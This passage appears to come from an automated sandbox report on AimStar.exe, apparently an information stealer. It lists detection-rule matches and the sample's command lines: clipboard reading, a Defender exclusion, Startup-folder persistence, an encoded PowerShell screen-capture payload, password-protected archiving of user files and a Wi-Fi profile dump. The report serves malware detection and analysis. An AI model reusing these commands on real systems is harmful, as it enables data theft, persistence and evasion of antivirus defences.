IAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7652, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", ProcessId: 7392, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\AimStar.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7444, TargetFilename: C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8064, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *, ProcessId: 7484, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7392, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe', ProcessId: 7524, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\AimStar.exe", ParentImage: C:\Users\user\Desktop\AimStar.exe, ParentProcessId: 7332, ParentProcessName: AimStar.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7952, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: AimStar.exeVirustotal: Detection: 36%Perma Link
              Source: AimStar.exeReversingLabs: Detection: 34%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF71396901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,88_2_00007FF71396901C
              Source: AimStar.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: AimStar.exe, 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdb source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: AimStar.exe, 00000002.00000002.2417417497.00007FF8A85C2000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: AimStar.exe, 00000000.00000003.2018153731.00000192BB8F0000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000002.2424874825.00007FF8BFAC4000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2417417497.00007FF8A865A000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.pdbhPV source: powershell.exe, 00000039.00000002.2230160700.000002A6B83B5000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000058.00000000.2307864420.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2424223799.00007FF8B9F61000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423338250.00007FF8B8F71000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421608946.00007FF8B7DF1000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: AimStar.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423964051.00007FF8B9841000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: AimStar.exe, 00000002.00000002.2423019564.00007FF8B8B3B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2423705275.00007FF8B93C1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422349344.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2422715924.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: AimStar.exe, 00000002.00000002.2419478466.00007FF8A8CD9000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: AimStar.exe, AimStar.exe, 00000002.00000002.2421997867.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F492F0 FindFirstFileExW,FindClose,0_2_00007FF710F492F0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF710F483B0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF710F618E4
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F492F0 FindFirstFileExW,FindClose,2_2_00007FF710F492F0
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 2_2_00007FF710F483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF710F483B0
